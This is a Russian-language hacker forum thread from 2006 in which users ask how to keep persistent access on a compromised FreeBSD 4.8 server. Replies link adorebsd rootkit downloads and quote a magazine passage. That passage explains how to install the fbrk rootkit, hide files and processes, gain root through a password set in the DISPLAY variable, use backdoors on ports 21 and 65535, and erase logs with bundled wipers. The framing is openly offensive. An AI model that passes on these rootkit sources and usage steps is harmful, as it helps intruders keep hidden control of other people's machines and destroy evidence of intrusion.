Трояним freeBSD

Запомнить меня

Привязать к IP

Нет аккаунта? Регистрация

Трояним freeBSD

12.07.2006, 16:42

zeppe1in

Постоянный

Регистрация: 12.07.2006

Сообщений: 327

С нами: 10437270

Репутация: 117

Трояним freeBSD

как лучше закрепица на фряхе 4.8? фбрк вроде не катит. Какие есть идеи?

𝕏 Twitter Reddit Telegram Копировать ссылку

12.07.2006, 19:03

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

http://www.eviltime.com/download/rootkit/adorebsd-0.34.tar.gz

__________________

12.07.2006, 22:24

zeppe1in

Постоянный

Регистрация: 12.07.2006

Сообщений: 327

С нами: 10437270

Репутация: 117

А ты сам его юзал? как там с глюками? и ваще пойдёт для этой версии?

FreeBSD rootkits

26.08.2006, 05:34

~~MINDFLY~~

Banned

Регистрация: 18.06.2006

Сообщений: 38

С нами: 10472429

Репутация: -10

FreeBSD rootkits

Нужен хороший rootkit под FreeBSD. Кто что может посоветовать ?

26.08.2006, 11:54

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

На здоровье...

_hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE% D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

27.08.2006, 01:23

~~MINDFLY~~

Banned

Регистрация: 18.06.2006

Сообщений: 38

С нами: 10472429

Репутация: -10

Цитата:

Сообщение от Dr.Check

На здоровье...

_hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE% D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

Да вот в том то и дело ,что поиск ничего и не дал, поэтому то я и запостил в форум , думал то ли мне не везет, то ли ищу не правильно , пока не прочитал ответ Desr0w.

26.08.2006, 13:37

Desr0w

Постоянный

Регистрация: 01.02.2006

Сообщений: 523

С нами: 10669286

Репутация: 319

Вырезка из статьи Форба в журнале Хакер.

Цитата:

Слово за FreeBSD

Согласись, несправедливо, что я описываю только linux-руткиты. Это связано с нехваткой хакерских комплектов для других систем. В частности для FreeBSD. Но не все так плохо: для фряхи существует средненький по возможностям руткит, который получил название fbrk (сокращенно от FreeBSD rootkit). Этот комплект может использоваться для FreeBSD версии 4.2-4.5.

Установить fbrk не просто, а очень просто. Достаточно запустить скрипт setup без параметров. Тебе предложат сгенерировать пароль, после чего все бинарники установятся в систему. Не стоит забывать об осторожности: я тестировал руткит на FreeBSD 4.6, после чего новые файлы перестали запускаться. Поэтому, как в случае с shv4, необходимо сделать спасительный бэкап. Прочитав readme, ты узнаешь о том, сколько всяких троянцев установится в систему. В первую очередь, fbrk хорош тем, что умеет скрывать файлы и процессы. Необходимо лишь занести их в конфиги /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00 соответственно. Синтаксис конфигов также указан в readme, поэтому посылаю тебя в этот файл для детального изучения руткита

.

Чтобы получить рутовые привилегии, нужно объявить переменную окружения DISPLAY, значением которой будет заданный пароль. После этого смело запускай telnet localhost и получай абсолютные права. Если залогиниться через FTP под твоим паролем (указывается в качестве username), то руткит даст тебе удаленного рута на 21 порту. По желанию на 65535 порту будет висеть еще один бэкдор, который активирует bash после ввода хакерского пароля.

Кроме этого, руткит содержит два незаменимых логклинера, которые называются freshb (бинарный логвайпер) и fresht (текстовый логвайпер). Им достаточно указать подстроку в качестве параметра, и логи будут быстро вычищены.

Если тебе не нравится этот руткит, можешь заюзать adore для FreeBSD, благо он тоже имеется (http://packetstormsecurity.nl/groups/teso/adorebsd-0.34.tar.gz). Те же модули, те же возможности, те же баги

, но только для твоей любимой Фряхи.

Последний раз редактировалось ShadOS; 05.04.2007 в 00:35..